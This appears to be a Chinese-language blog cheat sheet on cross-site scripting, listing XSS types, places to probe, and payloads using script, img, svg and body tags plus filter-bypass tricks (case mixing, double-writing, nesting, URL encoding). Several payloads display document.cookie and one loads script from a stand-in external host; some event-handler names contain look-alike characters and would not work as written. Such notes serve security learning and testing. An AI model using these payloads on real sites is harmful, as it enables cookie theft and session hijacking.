XSS漏洞

1.类型

反射型:大多用于盗取cookie信息

存储型:容易造成蠕虫,cookie盗窃  是高危漏洞

DOM型:不经过后端,是基于文档对象模型(Document Objeet Model,DOM)的一种漏洞,url传入参数去控制触发的,也属于反射型XSS。

2.挖掘的地方

评论区、留言区、注册信息、意见反馈、搜索框、URL参数和URL本身

3.标签用法

<script>

<script>alert("hack")</script>   #弹出hack

<script>alert(/hack/)</script>   #弹出hack

<script>alert(1)</script>        #弹出1,对于数字可以不用引号

<script>alert(document.cookie)</script>      #弹出cookie

<script src=http://xxx.com/xss.js></script>  #引用外部的xss

svg

<svg onload="alert(1)">

<svg onload="alert(1)"//

<img>

<img  src=1  οnerrοr=alert("hack")>

<img  src=1  οnerrοr=alert(document.cookie)>  #弹出cookie

<img  src="javascript:alert('hack');">

<body>

<body οnlοad=alert(1)>

<body οnpageshοw=alert(1)>

<body background="javascript:alert('1')">

video   style  input

<video οnlοadstart=alert(1) src="/http:192.168.xxx.xxx/video/2.mp4" />

<style οnlοad=alert(1)></style>

<input onfocus="alert('1');">

弹窗函数

<script>prompt('1')</script>

script被过滤

<sCRiPt>alert('XSS')</ScRIpT>   #大小写

<scriscriptpt>alert('xss')</scriscriptpt> #双写

<scr<script>ipt>alert('xss')</scr</script>ipt>  #嵌套

<0x736372697074>alert('XSS')</0x736372697074>  #十六进制编码

"><script>alert('XSS')</script> #闭合标签

%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%58%53%53%27%29%3C%2F%73%63%72%69%70%74%3E  #url编码

%3Cscript%3alert(document.cookie);%3C%2Fscript%3 #标签被过滤

<img/src="x"/onerror=alert("xss");>   #空格被过滤

4.xss漏洞利用

可以看这位大佬的文章 http://t.csdnimg.cn/HOdTV

  • 6
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值